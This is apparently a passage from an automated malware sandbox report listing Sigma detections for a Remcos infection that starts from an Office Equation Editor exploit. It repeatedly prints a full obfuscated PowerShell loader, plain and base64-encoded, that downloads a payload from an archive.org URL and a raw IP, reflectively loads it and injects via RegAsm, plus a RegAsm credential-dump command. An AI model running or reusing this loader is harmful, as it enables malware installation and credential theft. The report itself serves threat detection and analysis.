VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250Z
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250Z
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJl
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3352, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , ProcessId: 3520, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3352, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , ProcessId: 3520, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJl
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3792, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf", ProcessId: 3964, ProcessName: RegAsm.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3352, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , ProcessId: 3520, ProcessName: wscript.exe
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3352, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJl
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Local\Temp\mqun3wpm.4oj.ps1

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
